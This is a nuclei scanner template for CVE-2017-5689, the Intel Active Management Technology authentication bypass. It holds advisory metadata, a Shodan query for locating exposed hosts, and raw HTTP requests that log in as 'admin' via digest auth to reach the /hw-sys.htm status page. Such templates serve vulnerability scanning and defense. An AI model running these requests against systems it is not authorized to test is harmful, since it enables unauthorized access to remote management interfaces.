nuclei-templates/http/cves/2017/CVE-2017-5689.yaml

54 lines
2.1 KiB
YAML

id: CVE-2017-5689
info:
name: Intel Active Management - Authentication Bypass
author: pdteam
severity: critical
description: |
Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.
reference:
- https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
- https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
- https://www.embedi.com/news/mythbusters-cve-2017-5689
- https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
- https://nvd.nist.gov/vuln/detail/cve-2017-5689
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-5689
epss-score: 0.97416
cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:*
epss-percentile: 0.99888
metadata:
max-request: 2
shodan-query: title:"Active Management Technology"
verified: true
vendor: intel
product: active_management_technology_firmware
tags: cve,cve2017,amt,intel,tenable,kev
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /hw-sys.htm HTTP/1.1
Host: {{Hostname}}
req-condition: true
digest-username: admin
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "System Status"
- "Active Management Technology"
condition: and
- type: status
status:
- 200